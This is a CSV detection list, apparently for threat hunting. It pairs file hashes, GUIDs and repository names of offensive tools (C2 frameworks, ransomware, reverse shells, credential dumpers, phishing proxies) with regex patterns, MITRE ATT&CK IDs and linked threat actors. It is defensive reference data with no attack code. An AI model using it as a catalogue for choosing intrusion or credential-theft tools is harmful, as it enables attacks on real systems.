"*b11b6028e75a3bcbe194770f9613181009aaf40bdd23892e12e0ce32bbe90cfb*",".{0,1000}b11b6028e75a3bcbe194770f9613181009aaf40bdd23892e12e0ce32bbe90cfb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34469"
"*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","34470"
"*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","34471"
"*b12ada1dcac400d11a462a62ec3957adbdb82a4bfb04cef08533281bdbf286a5*",".{0,1000}b12ada1dcac400d11a462a62ec3957adbdb82a4bfb04cef08533281bdbf286a5.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","34475"
"*b138168e6c3df7f29121c84965648fea150456bc7f532cac39ec180d11aba33f*",".{0,1000}b138168e6c3df7f29121c84965648fea150456bc7f532cac39ec180d11aba33f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34477"
"*B138FFBA-1076-4B58-8A98-67B34E8A7C5C*",".{0,1000}B138FFBA\-1076\-4B58\-8A98\-67B34E8A7C5C.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#GUIDproject","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","34478"
"*b1505d27a4a0eda62dc0b193d635f01998e927e21b61dfcb7cb0e6c721a1cf65*",".{0,1000}b1505d27a4a0eda62dc0b193d635f01998e927e21b61dfcb7cb0e6c721a1cf65.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","34481"
"*b15de7b31497b070c3dcca0797cf38a75d828ef8ea76762d315ec876dec2e2c4*",".{0,1000}b15de7b31497b070c3dcca0797cf38a75d828ef8ea76762d315ec876dec2e2c4.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34483"
"*b16cdc0e46842b871c8beca3caebb6aa33ce0d8404b787f053dd31511c919fa3*",".{0,1000}b16cdc0e46842b871c8beca3caebb6aa33ce0d8404b787f053dd31511c919fa3.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34485"
"*b16e8bce64a834cf8b7844989a67ea4a7da36227034b54a864be9dfe1ce076e5*",".{0,1000}b16e8bce64a834cf8b7844989a67ea4a7da36227034b54a864be9dfe1ce076e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34486"
"*b1705ed5733748745497767e2a4855893131f76cbb4b28a58fddf89fa679b27b*",".{0,1000}b1705ed5733748745497767e2a4855893131f76cbb4b28a58fddf89fa679b27b.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","34487"
"*b17179a11cd25646af11ea28051b799bdacfe9fac6d66f2cf6e8dc1e4888916d*",".{0,1000}b17179a11cd25646af11ea28051b799bdacfe9fac6d66f2cf6e8dc1e4888916d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34488"
"*b17483ad91b189bd4ec7229fe188155f8c8deecb00a44c1016f1e1f36d454689*",".{0,1000}b17483ad91b189bd4ec7229fe188155f8c8deecb00a44c1016f1e1f36d454689.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34489"
"*B1865FC0-5605-4587-9FCB-8B9DF6B5C6B1*",".{0,1000}B1865FC0\-5605\-4587\-9FCB\-8B9DF6B5C6B1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","34493"
"*b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a*",".{0,1000}b18a6f563afe5afa141713e2a569de7faac174adef1d3fa467a44d7cd8598a8a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34494"
"*b18aca1b9e2a9e72cb77960c355d288b*",".{0,1000}b18aca1b9e2a9e72cb77960c355d288b.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","34495"
"*b18d778b4e4b6bf1fd5b2d790c941270145a6a6d*",".{0,1000}b18d778b4e4b6bf1fd5b2d790c941270145a6a6d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","34496"
"*b1906ee99c71103357472e4ec7710f973a3283178611af0b7c4b6e78b0687639*",".{0,1000}b1906ee99c71103357472e4ec7710f973a3283178611af0b7c4b6e78b0687639.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34497"
"*B1952AB299560820661C7D76EF8BCF224EBA551C2F5111525428E7F2CEA0AF9A*",".{0,1000}B1952AB299560820661C7D76EF8BCF224EBA551C2F5111525428E7F2CEA0AF9A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","34499"
"*b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865*",".{0,1000}b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34500"
"*B19E7FDE-C2CB-4C0A-9C5E-DFC73ADDB5C0*",".{0,1000}B19E7FDE\-C2CB\-4C0A\-9C5E\-DFC73ADDB5C0.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#GUIDproject","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","34504"
"*b1a86d6a5da383a5b86ec8d5a8e49555a233b08079edcc3f31da1b996d008c7b*",".{0,1000}b1a86d6a5da383a5b86ec8d5a8e49555a233b08079edcc3f31da1b996d008c7b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34506"
"*b1b5ef389275906c96e2326deb09d4eb6576fc692d8425ed0779a3acf3e1ab1b*",".{0,1000}b1b5ef389275906c96e2326deb09d4eb6576fc692d8425ed0779a3acf3e1ab1b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34510"
"*b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650*",".{0,1000}b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34511"
"*b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa*",".{0,1000}b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34513"
"*B1CB9A30-FEA6-4467-BEC5-4803CCE9BF78*",".{0,1000}B1CB9A30\-FEA6\-4467\-BEC5\-4803CCE9BF78.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34515"
"*b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67*",".{0,1000}b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34518"
"*b1dfc417ce748ffeec95311109dae13142c638e58cfa86eb6e5a0865082428aa*",".{0,1000}b1dfc417ce748ffeec95311109dae13142c638e58cfa86eb6e5a0865082428aa.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34520"
"*b1e0d02889530da4663fd9e0b3e324fb1325fe944dcdbc8d0fbf63d0f3d0c3e5*",".{0,1000}b1e0d02889530da4663fd9e0b3e324fb1325fe944dcdbc8d0fbf63d0f3d0c3e5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34521"
"*b1e9925fa0a268182267f3f1d77837ed9e5ac11a342aeb8ad293b37f0ca725e5*",".{0,1000}b1e9925fa0a268182267f3f1d77837ed9e5ac11a342aeb8ad293b37f0ca725e5.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34523"
"*b1f614b7eb188e8b7d47f08e333e05704aae24220409ab4e7e7b9fc03d339fdc*",".{0,1000}b1f614b7eb188e8b7d47f08e333e05704aae24220409ab4e7e7b9fc03d339fdc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34524"
"*b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e*",".{0,1000}b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34525"
"*b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd*",".{0,1000}b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34526"
"*b203229777ddc5db664f3d0bfba24bc7416f234139a22b2b326fa3fc49dd13cd*",".{0,1000}b203229777ddc5db664f3d0bfba24bc7416f234139a22b2b326fa3fc49dd13cd.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34527"
"*b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb*",".{0,1000}b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","#filehash","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","34528"
"*b20ef2d01915d91f5da22ad05e14dfa7f04af3c457d3267b2882a8cd9f560faa*",".{0,1000}b20ef2d01915d91f5da22ad05e14dfa7f04af3c457d3267b2882a8cd9f560faa.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34529"
"*b20f667c2539954744ddcb7f1d673c2a6dc0c4a934df45a3cca15a203a661c88*",".{0,1000}b20f667c2539954744ddcb7f1d673c2a6dc0c4a934df45a3cca15a203a661c88.{0,1000}","offensive_tool_keyword","PwDump7","pwdump7 works with its own filesytem driver (from rkdetector.com technology) so users with administrative privileges are able to dump directly from disk both SYSTEM and SAM registry hives. Once dumped - the SYSKEY key will be retrieved from the SYSTEM hive and then used to decrypt both LanMan and NTLM hashes and dump them in pwdump like format.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.openwall.com/passwords/windows-pwdump","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","34530"
"*b220de41dd61f8477fff83c8930a8a1759c3c1cb3da593698136b79f37ba01b9*",".{0,1000}b220de41dd61f8477fff83c8930a8a1759c3c1cb3da593698136b79f37ba01b9.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34531"
"*b22850c4a39e5abf07c8e91b943cd477f31a21dc6942801e58d756782cfbc095*",".{0,1000}b22850c4a39e5abf07c8e91b943cd477f31a21dc6942801e58d756782cfbc095.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","34532"
"*b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401*",".{0,1000}b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","34535"
"*b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508*","b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","34537"
"*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*",".{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","0","#filehash","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","34538"
"*b2383e05411ba4a0e24dbfc67e5e4e1ddeae37acdf1137bccbf8d190d13c78a5*",".{0,1000}b2383e05411ba4a0e24dbfc67e5e4e1ddeae37acdf1137bccbf8d190d13c78a5.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#filehash","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","34539"
"*b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241*",".{0,1000}b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34540"
"*b23cad6402b0c5f9fd57be07243481a351cf32a0629d7cc03551d1621a6c208c*",".{0,1000}b23cad6402b0c5f9fd57be07243481a351cf32a0629d7cc03551d1621a6c208c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34541"
"*b23r0/cliws*",".{0,1000}b23r0\/cliws.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34542"
"*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","34543"
"*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","34544"
"*b23r0/rsocx*",".{0,1000}b23r0\/rsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","34545"
"*b23r0@foxmail.com*",".{0,1000}b23r0\@foxmail\.com.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux #email","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","34546"
